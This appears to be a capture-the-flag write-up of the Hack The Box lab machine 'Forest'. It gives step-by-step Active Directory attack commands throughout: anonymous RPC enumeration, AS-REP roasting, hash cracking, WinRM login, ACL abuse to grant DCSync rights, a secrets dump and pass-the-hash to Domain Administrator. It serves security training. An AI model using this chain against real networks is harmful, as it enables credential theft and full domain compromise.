Overview

Forest is a beginner-friendly Active Directory machine that focuses on domain enumeration, Kerberos abuse, BloodHound privilege analysis, and ACL exploitation.

The machine demonstrates how a low-privileged domain account can eventually lead to full Domain Administrator compromise through delegated Active Directory permissions.


Attack Path Summary

Anonymous RPC Enumeration
User Discovery
AS-REP Roasting
Hash Cracking
WinRM Access
BloodHound Analysis
ACL Abuse
DCSync
Domain Administrator

Reconnaissance

Nmap Scan

Initial service enumeration:

nmap -sVC -Pn 10.129.37.0

Results:

53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
5985/tcp open  http

The exposed services strongly suggested that the target was functioning as a Domain Controller.

Important observations:

  • Kerberos exposed
  • LDAP available
  • SMB accessible
  • WinRM enabled


Service Enumeration

Anonymous RPC enumeration was allowed on the target system.

Using rpcclient, domain users could be enumerated without authentication.


Vulnerability Identification

The environment exposed several common Active Directory attack surfaces:

  • Anonymous RPC access
  • Kerberos accounts vulnerable to AS-REP Roasting
  • Excessive delegated ACL permissions
  • WinRM access for remote management

Initial Foothold

RPC Enumeration

Using rpcclient:

rpcclient -U "" -N 10.129.37.0

Enumerating users:

enumdomusers

Interesting accounts discovered:

sebastien
lucinda
svc-alfresco
andy
mark
santi

Among the enumerated users, svc-alfresco appeared to be a service account and became the primary target for further investigation.


AS-REP Roasting

AS-REP Roasting is a Kerberos attack technique that targets accounts with Kerberos pre-authentication disabled.

Attackers can request encrypted authentication material directly from the Domain Controller without valid credentials and attempt offline password cracking.

Using Impacket:

impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.37.0

Successful output:

$krb5asrep$23$svc-alfresco@HTB.LOCAL:...

The account was confirmed to be vulnerable to AS-REP Roasting.


Cracking the Hash

Using Hashcat:

hashcat -m 18200 svc-alfresco.hash /usr/share/wordlists/rockyou.txt

Recovered credentials:

svc-alfresco:s3rvice

WinRM Access

Using the recovered credentials, remote shell access was obtained through WinRM:

evil-winrm -u svc-alfresco -p 's3rvice' -i 10.129.37.0

Successful authentication granted PowerShell access to the target system.


Privilege Escalation

BloodHound Enumeration

BloodHound Attack Path

After obtaining an initial foothold, internal Active Directory enumeration was performed using SharpHound.

BloodHound analysis revealed the following privilege chain:

Account Operators
        ↓ GenericAll
Exchange Windows Permissions
        ↓ WriteDacl
HTB.LOCAL Domain Object

The compromised svc-alfresco account was a member of Account Operators, which possessed GenericAll permissions over the Exchange Windows Permissions group.

The Exchange Windows Permissions group had WriteDacl rights over the domain object, making it possible to grant DCSync privileges to svc-alfresco.

ACL Abuse

Adding svc-alfresco to the Exchange Windows Permissions group:

bloodyAD --host 10.129.37.0 \
-d htb.local \
-u svc-alfresco \
-p 's3rvice' \
add groupMember "EXCHANGE WINDOWS PERMISSIONS" "svc-alfresco"

Granting DCSync privileges:

bloodyAD --host 10.129.37.0 \
-d htb.local \
-u svc-alfresco \
-p 's3rvice' \
add dcsync svc-alfresco

DCSync Attack

Using Impacket:

impacket-secretsdump htb.local/svc-alfresco:'s3rvice'@10.129.37.0

Administrator NTLM hash:

Administrator:32693b11e6aa90eb43d32c72a07ceea6

Administrator Access

Using Pass-the-Hash authentication:

evil-winrm -i 10.129.37.0 \
-u Administrator \
-H 32693b11e6aa90eb43d32c72a07ceea6

Successful authentication resulted in Domain Administrator access.


Skills & Concepts

  • Active Directory Enumeration
  • RPC Enumeration
  • Kerberos Abuse
  • AS-REP Roasting
  • BloodHound Analysis
  • ACL Abuse
  • DCSync
  • Pass-the-Hash
  • Active Directory Privilege Escalation

Tools Used

  • Nmap
  • rpcclient
  • Impacket
  • Hashcat
  • Evil-WinRM
  • BloodHound
  • SharpHound
  • BloodyAD

Lessons Learned

Forest is an excellent introductory Active Directory machine because it demonstrates several core AD attack concepts in a realistic attack chain:

  • Anonymous domain enumeration
  • Kerberos abuse through AS-REP Roasting
  • Internal privilege mapping with BloodHound
  • ACL-based privilege escalation
  • DCSync attacks
  • Pass-the-Hash authentication

The machine also highlights the dangers of excessive delegated permissions and insecure Active Directory configurations inside enterprise environments.